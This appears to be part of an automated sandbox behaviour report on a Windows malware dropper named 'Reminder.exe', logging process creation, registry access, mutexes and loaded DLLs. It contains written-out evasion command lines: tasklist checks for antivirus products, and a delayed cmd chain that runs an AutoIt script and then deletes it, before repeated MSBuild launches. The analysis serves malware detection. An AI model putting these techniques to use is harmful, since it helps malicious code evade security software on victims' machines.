                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_00743DBD CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,35_2_00743DBD
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpFile created: C:\Users\user\AppData\Local\friendJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4296:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2200:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2132:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3288:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6768:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_03
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\cb36de7f397799e419deb9caf3a96a89
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:280:120:WilError_03
                      Source: C:\Users\user\Desktop\Reminder.exeFile created: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmpJump to behavior
                      Source: C:\Users\user\Desktop\Reminder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\Desktop\Reminder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\Desktop\Reminder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\Desktop\Reminder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\edgheaa\AutoIt3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\edgheaa\AutoIt3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'WRSA.EXE'
                      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'OPSSVC.EXE'
                      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
                      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
                      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
                      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\Reminder.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                      Source: MSBuild.exeString found in binary or memory: " /add /y
                      Source: MSBuild.exeString found in binary or memory: " /add
                      Source: C:\Users\user\Desktop\Reminder.exeFile read: C:\Users\user\Desktop\Reminder.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Reminder.exe "C:\Users\user\Desktop\Reminder.exe"
                      Source: C:\Users\user\Desktop\Reminder.exeProcess created: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp "C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp" /SL5="$20434,1768989,845824,C:\Users\user\Desktop\Reminder.exe"
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpProcess created: C:\Users\user\Desktop\Reminder.exe "C:\Users\user\Desktop\Reminder.exe" /VERYSILENT
                      Source: C:\Users\user\Desktop\Reminder.exeProcess created: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp "C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp" /SL5="$20442,1768989,845824,C:\Users\user\Desktop\Reminder.exe" /VERYSILENT
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpProcess created: C:\Users\user\AppData\Local\friend\Updater.exe "C:\Users\user\AppData\Local\friend\\Updater.exe" "C:\Users\user\AppData\Local\friend\\yeorling.csv"
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\huv9LF4.a3x && del C:\ProgramData\\huv9LF4.a3x
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\friend\Updater.exe updater.exe C:\ProgramData\\huv9LF4.a3x
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      Source: unknownProcess created: C:\edgheaa\AutoIt3.exe "C:\edgheaa\AutoIt3.exe" C:\edgheaa\fkccfcd.a3x
                      Source: C:\edgheaa\AutoIt3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      Source: C:\edgheaa\AutoIt3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      Source: C:\edgheaa\AutoIt3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      Source: unknownProcess created: C:\edgheaa\AutoIt3.exe "C:\edgheaa\AutoIt3.exe" C:\edgheaa\fkccfcd.a3x
                      Source: C:\edgheaa\AutoIt3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      Source: C:\edgheaa\AutoIt3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      Source: C:\Users\user\Desktop\Reminder.exeProcess created: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp "C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp" /SL5="$20434,1768989,845824,C:\Users\user\Desktop\Reminder.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpProcess created: C:\Users\user\Desktop\Reminder.exe "C:\Users\user\Desktop\Reminder.exe" /VERYSILENTJump to behavior
                      Source: C:\Users\user\Desktop\Reminder.exeProcess created: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp "C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp" /SL5="$20442,1768989,845824,C:\Users\user\Desktop\Reminder.exe" /VERYSILENTJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpProcess created: C:\Users\user\AppData\Local\friend\Updater.exe "C:\Users\user\AppData\Local\friend\\Updater.exe" "C:\Users\user\AppData\Local\friend\\yeorling.csv"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\huv9LF4.a3x && del C:\ProgramData\\huv9LF4.a3xJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\friend\Updater.exe updater.exe C:\ProgramData\\huv9LF4.a3xJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                      Source: C:\edgheaa\AutoIt3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                      Source: C:\edgheaa\AutoIt3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                      Source: C:\edgheaa\AutoIt3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                      Source: C:\edgheaa\AutoIt3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                      Source: C:\edgheaa\AutoIt3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                      Source: C:\Users\user\Desktop\Reminder.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Reminder.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpSection loaded: winsta.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpSection loaded: shfolder.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Reminder.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Reminder.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpSection loaded: winsta.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpSection loaded: shfolder.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpSection loaded: sfc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpSection loaded: explorerframe.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
                      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
